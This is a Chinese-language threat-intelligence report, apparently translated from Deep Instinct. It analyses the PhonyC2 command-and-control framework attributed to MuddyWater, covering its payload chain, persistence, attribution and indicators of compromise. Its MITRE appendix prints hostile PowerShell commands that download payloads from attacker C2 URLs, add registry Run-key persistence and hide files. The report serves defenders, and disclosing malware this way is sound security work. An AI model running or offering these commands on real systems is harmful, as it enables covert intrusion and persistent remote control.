PhonyC2：揭示MuddyWater的新恶意命令和控制框架

1. 摘要

Deep Instinct的威胁研究团队已经确定了一个新的C2(命令与控制)框架，C2框架是定制的，持续开发的，至少从2021年起就被MuddyWater集团使用，该框架被命名为PhonyC2，用于攻击以色列理工学院，目前被MuddyWater用于活跃的PaperCut漏洞利用活动，PhonyC2类似于之前由MuddyWater创建的C2框架——MuddyC3。MuddyWater正在不断更新PhonyC2框架并更改TTPs以避免检测，这可以从本文和PhonyC2泄露代码的调查中看到。MuddyWater使用社会工程作为其主要的初始接入点，因此它们可以感染完全打过补丁的系统，组织应继续强化系统并监视PowerShell活动。

2. 背景

MuddyWater，也被称为Mango Sandstorm (Mercury)，是一个网络间谍组织，是某中东国家情报和安全部(MOIS)的下属机构。

2023 年 2 月，Deep Instinct 的威胁研究团队发现了三个恶意 PowerShell 脚本，这些脚本是一个名为PhonyC2_v6.zip的存档的一部分。

注意：V6 是在服务器上找到的文件夹的名称。由于这不是一个已知的 C2 框架，因此没有更新日志和版本历史记录。随着时间的推移，框架已经发生了变化，但我们不知道内部版本号，因此，我们通过唯一标识符而不是版本号来引用其他版本。

文件名激起了我们的兴趣，我们开始发现它是否是一个已知的C2框架，经过快速调查，发现C2框架是由Sicehice在一个开放目录列表的服务器中发现的。

图1：位于服务器上的文件的图片

注意：Sicehice 是一个自动收集来自 30 多个来源的网络威胁情报的组织，并使用户能够根据收集的 IP 进行搜索。

之前没有关于 PhonyC2 的信息，由于 zip 文件包含源代码，我们决定分析代码以进一步了解这个 C2 框架。

我们的初步调查显示，托管C2的服务器与MuddyWater在攻击以色列理工学院时使用的基础设施有关。

进一步的研究揭示了MuddyWater基础设施的其他连接，包括正在进行的PaperCut漏洞利用和以前使用早期版本的C2框架的攻击。

3. 公开的服务器分析

除了PhonyC2的zip文件外，Sicehice还上传了在服务器上找到的其他文件，包括“.bash_history”文件，该文件揭示了威胁参与者在服务器上运行的命令：

图2：.bash_history文件的开头

图3：.bash_history文件的末尾

在图1中，我们可以看到“Ligolo”的存在，这是已知由 MuddyWater 使用的另一个工具。

在图2中，与 PhonyC2 相关的命令标记为红色。

在图2和图3中，用蓝色标记的是威胁参与者使用的其他IP地址。在微软发布的报告中，这两个地址都被称为C2服务器，他们将以色列理工学院的攻击归咎于MuddyWater。

开源工具用橙色标记，众所周知，FRP被几个某中东国家威胁组织使用，而Chisel只被MuddyWater使用，但这并不意味着它是独有的。

此外，在图3中，我们可以看到MuddyWater之前没有使用过的另一种名为“bore”的隧道工具。

服务器上已知的MuddyWater工具的存在以及威胁参与者与已知MuddyWater使用的两个IP地址进行通信的事实使人们怀疑PhonyC2是MuddyWater使用的框架。

4. 进一步观察：代码分析

为了更好地理解Phony C2框架，我们查看了源代码。正如我们在上面的图2中看到的，第一个感兴趣的文件是“Please_Run_Once.py”:

图4：Please_Run_Once.py代码

该脚本创建一个唯一的配置文件，其中必须指定IP地址、C2框架侦听连接的端口和诱饵的扩展名，如图4中的第5行所示。此外，脚本将在config.py文件中添加随机uuid(通用唯一标识符)，这使得跟踪C2框架的url不那么容易。

config.py文件的示例:

图5：第 13-20 行中随机 UUID 的 config.py 示例

图6：来自 config.py 的其他信息

在图 6 中，配置文件包含各种 PowerShell 命令，这些命令是框架使用的不同有效负载。

main.py 文件很小，可以启动多线程 Web 服务器和一个命令行侦听器，从这段代码中，我们看到名称“PhonyC2”在内部使用：

图7：main.py 内容

webserver.py 负责为 C2 框架有效负载提供服务：

图8：webserver.py代码的一部分

图8显示了之前框架迭代中注释掉的路由名的残余部分，这些路由名在这次框架迭代中被config.py文件中的随机UUID替换(图5中的第13-20行)。

Commandline.py 接收来自命令行操作符的命令并打印 C2 执行的各种操作的输出：

图9：commandline.py代码的一部分

图 9 和图 5 是名为“C：programdatadb.sqlite”和“db.ps1”的文件的代码，在微软关于以色列理工学院黑客攻击的报告中，这两个文件都以相同的名称和路径被提及。

虽然微软报告中的恶意文件没有公开供检查，但微软报告中出现的与PhonyC2相关的IP地址与这些文件名相结合有力地证明了在对以色列理工学院的攻击中使用了PhonyC2框架。此外，C2框架创建的文件被检测为“PowerShell/Downloader.SB”，微软在他们的博客中使用了相同的检测名称。

由于这两个文件都是由C2框架动态生成的，因此它们在框架的每次执行中略有不同，因此，阻止微软提供的哈希并不是完全有效的。

5. 工作原理

图10：PhonyC2命令

虽然看起来有很多选项和输出，但如果我们理解代码的作用，C2实际上很简单。

这个C2是一个后渗透利用框架，用于生成各种有效载荷，这些载荷连接回C2并等待操作的指令来执行“入侵杀伤链”的最后一步。

“有效载荷”命令:

图11：“有效负载”命令输出

在图 11 中，我们看到了所发生情况的分步说明：

PowerShell命令创建一个http请求到C2以接收一个加密文件，并将其保存为“c:programdatadb.sqlite”。
PowerShell命令将base64解码的内容写入“c:programdatadb.ps1”。

图12：db.ps1的内容

PowerShell命令执行db.ps1，然后读取和解码db.sqlite并在内存中执行结果。

从本质上讲，这是在受感染主机上执行的单行代码，因此它将信标返回到 C2。

6. 解码例程示例

如前所述，C2 生成的文件每次都略有不同，但是，解码逻辑基本保持不变。

下面是 db.sqlite 内容的示例和解释解码例程的图表：

图13：来自 C2 服务器的 HTML 响应，用于步骤 #1

图14：解码例程流（值可能会在不同的执行中发生变化）

“dropper”命令：

此命令仅为步骤（1）创建 PowerShell 命令的不同变体。

图15：“dropper”命令输出

“Ex3cut3”命令:

这个命令为步骤(2)和步骤(3)创建不同的PowerShell命令变体:

图16：“Ex3cut3”命令输出

“list”命令：

list 命令显示所有连接到 C2 的主机以及一些相关信息：

图17：“list”命令输出

“setcommandforall”命令:

此命令是最重要的一个，因为它允许威胁参与者同时在所有连接的计算机上执行相同的命令，例如，下载并执行勒索软件有效载荷的命令。

图18：“setcommandforall”命令输出

“use”命令：

此命令允许威胁参与者在特定主机上获取PowerShell命令：

图19：“use”命令输出

如果选择了“use”命令，则其他命令可用：

图20：选择“use”后的其他命令选项

“persist”和其他命令：

这些附加命令中的大多数都是不言自明的，唯一有趣的命令是“persist”。

图21：“persis”命令输出

" persist "命令用于生成PowerShell代码，使操作人员能够获得受感染主机上的持久性，以便在受感染主机重新启动时连接回C2。

此外，当操作员执行“persist”命令时，它将加密的有效载荷写入“HKLMSoftware”中预定义的随机注册表路径。这可以在commandline.py中部分看到(图22)，同时一些值存储在config.py中。

加密的有效负载是“persist_payload_2022.ps1”的略微修改版本，同时该载荷也是促成整个调查分析的代码。

图22：与commandline.py中的持久性相关的代码

下面是PhonyC2用来实现持久性的完整链:

通过在连接到PhonyC2的机器上执行“persist”，C2将加密的有效负载写入注册表
在Windows注册表添加注册表项来运行一个启动项目录的utils.jse的脚本文件，该脚本文件实际位于C:intelutils目录
如果目录c:intelutils不存在，则创建该目录
将当前目录更改为c:intelutils
解码base64二进制代码并将其写入utils.jse

图23：utils.jse 的内容（每次执行都会更改一些值）

在 HKLM：\SOFTWARE\<random> （iCXqExISMHV）上创建一个具有随机名称（fmoopWgmBla）的注册表项，其内容类似于以下内容：

图24：写入注册表并带有分析注释的内容

重新启动计算机时，注册表项会执行 utils.jse 脚本
utils.jse 脚本从图 23 所示相关注册表中读取并执行内容
图 25 中的 PowerShell 代码连接到 C&C 服务器，以接收和执行类似于以下内容的代码：

图25：输入是从服务器返回的base64

base64 解码脚本会从注册表读取和解密另一个有效负载，此有效负载基于“persist_payload_2022.ps1”。

7. 感染流程

图26：PhonyC2的感染流程

8. 归因

PhonyC2的当前版本是用Python3编写的，它在结构和功能上与MuddyWater之前用Python2编写的自定义C2框架——MuddyC3相似。

图27：MuddyC3输出，见图10;与PhonyC2相似

根据我们从调查PhonyC2源代码中收集的信息，我们相信PhonyC2是MuddyC3和POWERSTATS的继承者。

我们调查了之前的 MuddyWater 入侵，以确定首次使用 PhonyC2 的时间，我们发现在2021年11月29日，IP地址87.236.212.22以混淆的有效负载作为回应，我们认为这是用Python2编写的Phony C2的早期变体。为了证明这一点，我们可以看到威胁参与者在图4 中留下的注释，该参与者请求更改到使用 Python3运行脚本的代码。

经过混淆处理的有效负载被保存到名为“data.sqlite”的文件中，这与PhonyC2中使用的文件名非常相似。此外，混淆后的有效负载与当前PhonyC2有效负载具有相同的逗号分隔符，并且解码程序与最新的程序不同。

在图6和8中，字符串“apiy7”在代码中被注释掉了，我们发现了一个2022年3月提交的包含该字符串的URL，这意味着这是一个PhonyC2服务器，但版本比本博客中描述的当前V6版本更早。

该URL的IP地址为137.74.131.30。Group-IB报告中提到它具有“ETag 2aa6-5c939a3a79153”。

178.32.30.3 是另一个同时具有“apiy7”字符串和“ETag 2aa6-5c939a3a79153”的 IP 地址，Talos在3月份发表的一篇博客中也提到了MuddyWater的活动细节。但是，我们无法确认该活动是否与PhonyC2有关。PhonyC2在此服务器上的第一次确认是八月份的URL扫描，其中包含“apiy7”字符串。同一个IP地址在8月份进行了另一次扫描，发现了一个自定义错误消息，显示了其他的PhonyC2服务器，从这些其他的服务器中，我们能够找到从2022年3月到2022年5月的字符串为“apiv4”的额外PhonyC2服务器，这些服务器早于“apiy7”PhonyC2版本。

IP地址91.121.240.104包含“apiy7”字符串和“ETag 2aa6-5c939a3a79153”。微软证实了这是MuddyWater用来利用以色列SysAid软件log4j漏洞的IP地址，也证实了PhonyC2被用于这些攻击。

在我们的研究过程中，我们发现PhonyC2服务器具有不同的ETag值或根本没有ETag，我们怀疑出现具有相同ETag值的服务器是由于VPS提供商复制了服务器映像。因此，这种方法可能在过去偶尔有效。

正如我们在“服务器分析”一节中提到的，图 2 和图 3 中有两个 IP 地址。194.61.121.86 和 45.86.230.20被微软证实为MuddyWater在以色列理工学院黑客攻击中使用的C2服务器。虽然我们无法确认是否45.86.230.20为正在运行的PhonyC2，但微软报告中列出的46.249.35.243和 194.61.121.86是托管了基于我们在python源代码中看到的URL模式的PhonyC2 V6。

我们在MuddyWater的操作中观察到的另一个有趣的共同点是“core”的使用。在MuddyC3中有一个名为“core”的目录，在PhonyC2中有一个名为“isnotcore”的目录，“core”在代码中也被多次引用(参见图4-8)。根据我们的分析，PowGoop C2服务器的URL模式为“Core?Token=”。我们怀疑其中一个IP为164.132.237.79的服务器可能仍由MuddyWate控制运行PowGoop，该IP目前正在运行被MuddyWater已知并使用的Metasploit服务器。

此 IP 的被动 DNS 解析显示域 6nc110821hdb.co，此域还解析为另外两个 PowGoop 服务器：

图28：6nc110821hdb.co的被动DNS解析

根据Group-IB，51.255.19.178和51.255.19.179这两个服务器正在托管SimpleHelp，Group-IB还将164.132.237.64/28子网中的许多IP列为SimpleHelp服务器，这显然表明164.132.237.79在某种程度上也与MuddyWater活动有关，6nc110821hdb.co域名看起来相当可疑，经过进一步调查，我们发现了一个有趣的模式:

<3个字母><1个数字>[.]6nc<日期><可选的2个字母><可选的额外字母>[.]co

我们检测到以下域名仍然具有被动DNS解析的活动主机。

6nc051221a[.]co

6nc051221c[.]co

6nc110821hdb[.]co

6nc060821[.]co

6nc220721[.]co

我们怀疑这些域名代表了MuddyWater在2021年注册的并在今天仍然活跃的基础设施。

还有一些我们没有找到活动基础设施的附加域，例如6nc051221b.co和6nc110821hda.co，在过去，后者是解决已知的MuddyWater基础设施。“6nc”可以理解为C&C (Six and C)，是“指挥与控制”的缩写。

在2023年5月初，微软在推特上提到，他们发现MuddyWater利用了PaperCut打印管理软件中的CVE-2023-27350。虽然他们没有分享任何新的指标，但他们指出MuddyWater正在“使用先前入侵的工具连接到他们的C2基础设施”，并引用了他们关于以色列理工学院黑客的博客，我们已经确定其使用的是PhonyC2。大约在同一时间，Sophos 公布了他们看到的各种 PaperCut 入侵的指标。Deep Instinct发现这些入侵的IP地址中有两个IP地址是基于URL模式的PhonyC2服务器。

1) 185.254.37.173

此 IP 地址还托管各种有效负载。虽然我们无法检索其中的大部分，但我们能够在 Censys 中捕获服务器的目录列表。

图29：185.254.37.173的目录列表

名为 eh.msi 的文件已上传到 VirusTotal，此文件是 eHorus 远程访问工具的安装程序，Mandiant也提到了与MuddyWater重叠的一系列活动使用了完全相同的文件。此外，微软和赛门铁克还观察到MuddyWater使用eHorus软件。

2) 45.159.248.244

在这个PhonyC2实例中，MuddyWater决定使用端口53作为服务器，该端口通常保留给DNS使用。这表明MuddyWater又一次试图改变他们的TTPs并隐藏他们的恶意活动。

这也是PhonyC2与微软对MuddyWater活动的报道第三次重叠。

9. 展望未来

MuddyWater不断更新C2并更改TTP以避免检测，这在整个博客中以及在调查PhonyC2泄漏的代码中都可以看到。

Deep Instinct已经观察到一个疑似PhonyC2实例，该实例使用比V6版本更新的代码版本，该代码版本在IP 195.20.17.44的URL扫描中泄露：

图30：比 V6版本更新的PhonyC2的 URL 扫描

从 PhonyC2 V6 开始，标记为红色的 URL 部分进行了改变，更改了 UUID 的使用并添加了“go”扩展名。绿色 URL 的第二部分尚未从 V6 代码更改。

对此扫描的响应是以下有效负载。

图31：新的 PhonyC2 有效负载（请参阅图 13 参考）

虽然编码的有效载荷（绿色）看起来类似于我们在V6中看到的，但MuddyWatter添加了一个伪装的HTML代码（红色）来进一步隐藏他们的活动。在PhonyC2 V6中，服务器响应仅仅是加密的有效负载，没有任何HTML。此外，服务器位置的IP地址195.20.17.44 位于以色列，我们怀疑选择此位置是为了在针对以色列组织的针对性攻击中隐藏网络流量。

在检查这个较新的PhonyC2服务器的子网195.20.17.0/24时，我们观察到许多与网络犯罪有关的IP地址，但是，其中一个IP地址195.20.17.183的被动DNS响应为am1211.iransos.me。虽然我们无法确认这个IP地址是否与MuddyWater有关，但我们怀疑整个子网都已经租给了MuddyWater使用的一些某中东国家VPS提供商。

您可以在我们的GitHub页面中找到PhonyC2和IOC的源代码。

10. 附录 MITRE与IOC

10.1 MITRE

策略	技术	描述	观察
命令与控制	T1071.001 应用层协议：Web 协议	Phony C2 使用 HTTP 下载经过混淆的有效负载	http://46.249.35[.]243:443/9b22685e-f173-4feb-95a4-c63daaf40c58.html?X9GFTRD6OZE=X9GFTRD6OZ
T1132.002 数据编码：非标准编码	使用自定义编码对Phony C2 有效负载进行模糊处理	,15555554155555554,14((1414,1554(14(,1554(14(,15415554,1554(14(,1414(,154((154,154154((,1554(154,1414(,14(14((,14((((14,154(14((,154(14((,1554(14(,154(1414,1554(154,1554(154,14(((((,1555414,14(((((,14((14(,15414(((,155414((,155414((,1554((((,155414(,1415554,1415554,154((14,1541554,154(14(,141554(,154((14,154154(,141554(,154((14,154154(,154(14(,141554(,154((14,155414(,
T1105 入口工具传输	Phony C2 能够从 C2 服务器下载有效负载	http://46.249.35[.]243:443/9b22685e-f173-4feb-95a4-c63daaf40c58.html?X9GFTRD6OZE=X9GFTRD6OZ
坚持	T1547.001 启动或登录自动启动执行：注册表运行项/启动文件夹	Phony C2 具有添加持久性机制的能力	reg add HKLMSoftwareMicrosoftWindowsCurrentVersionRun /v NEW /d C:intelutilsutils.jse /f
执行	T1059.001 命令和脚本解释器：PowerShell	Phony C2 由 PowerShell 执行，并正在执行 PowerShell 命令	powershell Start-Job -ScriptBlock {Invoke-WebRequest -UseDefaultCredentials -UseBasicParsing -Uri http://172.16.162.1:1337/562a2ffe-a45a-4318-864b-5942fbd0a859.aspx?LY6EDE1KTNE=LY6EDE1KTNE -OutFile $input } -InputObject "c:programdatadb.sqlite";sleep 6
防御规避	T1564.001隐藏构件：隐藏文件和目录	Phony C2 正在为 C：ProgramData 中的文件设置隐藏属性	attrib +h c:programdatadb.sqlite
T1564.003 隐藏构件：隐藏窗口	执行Phony C2 以隐藏 PowerShell 窗口	powershell -EP BYPASS -NoP -W 1
T1070.004指示灯删除：文件删除	Phony C2在执行后删除文件	rm c:programdatadb.sqlite ; rm c:programdatadb.ps1
T1112 修改注册表	Phony C2 创建注册表项以实现持久性	New-ItemProperty -Path "HKLM:SOFTWAREiCXqExISMHV" -Name "fmoopWgmBla" -Value '$p_id =…'

10.2 攻击指标IOC

IP地址	描述
45.159.248.244	PhonyC2 V6 (PaperCut)
91.121.240.104	PhonyC2同时具有"apiy7"字符串与ETag 2aa6-5c939a3a79153(log4j)
195.20.17.44	疑似PhonyC2 V7
45.86.230.20	与PhonyC2活动相关的MuddyWater基础设施（DarkBit Technion）
137.74.131.30	PhonyC2 同时具有"apiy7"字符串与ETag 2aa6-5c939a3a79153
178.32.30.3	PhonyC2具有"apiy7"字符串
137.74.131.24	PhonyC2同时具有"apiy4"字符串和/或"apiy7"字符串与ETag 2aa6-5c939a3a79153
46.249.35.243	PhonyC2 V6 (DarkBit Technion)
185.254.37.173	PhonyC2 V6 (PaperCut)
194.61.121.86	PhonyC2 V6 (DarkBit Technion)
87.236.212.22	疑似第一版的 PhonyC2
91.235.234.130	PhonyC2 V6.zip
157.90.153.60	PhonyC2具有"apiy4"字符串
157.90.152.26	PhonyC2具有"apiy4"字符串
65.21.183.238	PhonyC2具有"apiy4"字符串
45.132.75.101	疑似MuddyWater基础设施(edc1.6nc051221c[.]co)
51.255.19.178	疑似MuddyWater基础设施(pru2.6nc110821hdb[.]co)
103.73.65.129	疑似MuddyWater基础设施(nno1.6nc060821[.]co)
103.73.65.225	疑似MuddyWater基础设施(nno3.6nc060821[.]co)
103.73.65.244	疑似MuddyWater基础设施(kwd1.6nc220721[.]co)
103.73.65.246	疑似MuddyWater基础设施(kwd2.6nc220721[.]co)
103.73.65.253	疑似MuddyWater基础设施(kwd3.6nc220721[.]co)
137.74.131.16	疑似MuddyWater基础设施(qjk1.6nc051221c[.]co)
137.74.131.18	疑似MuddyWater基础设施(qjk2.6nc051221c[.]co)
137.74.131.25	疑似MuddyWater基础设施(qjk3.6nc051221c[.]co)
164.132.237.67	疑似MuddyWater基础设施(tes2.6nc051221a[.]co)
164.132.237.79	疑似MuddyWater基础设施(pru1.6nc110821hdb[.]co)

框架生成的文件示例(这些不是详尽的):

SHA256	描述
7cb0cc6800772e240a12d1b87f9b7561412f44f01f6bb38829e84acbc8353b9c	db.ps1
5ca26988b37e8998e803a95e4e7e3102fed16e99353d040a5b22aa7e07438fea	db.sqlite
1c95496da95ccb39d73dbbdf9088b57347f2c91cf79271ed4fe1e5da3e0e542a	utils.jse
2f14ce9e4e8b1808393ad090289b5fa287269a878bbb406b6930a6c575d1f736	db.ps1
b4b3c3ee293046e2f670026a253dc39e863037b9474774ead6757fe27b0b63c1	db.sqlite
b38d036bbe2d902724db04123c87aeea663c8ac4c877145ce8610618d8e6571f	utils.jse